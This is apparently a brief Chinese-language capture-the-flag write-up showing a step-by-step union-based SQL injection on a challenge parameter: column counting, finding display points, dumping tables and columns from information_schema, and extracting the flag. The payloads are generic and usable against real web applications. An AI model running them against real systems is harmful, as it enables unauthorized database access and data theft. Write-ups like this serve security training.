打开题目,先查看源代码,发现参数是wllm
先试一下 ?wllm=1
判断字段数
?wllm=1' order by 1/2/3 --+,发现到4不行,说明字段数为3
查看回显点
?wllm=-1' union select 1,2,3 --+
查看数据库信息
爆表
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db' --+
说明有两个表test_tb和users
先爆test_tb
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' --+
查flag
?wllm=-1' union select 1,2,group_concat(flag) from test_tb --+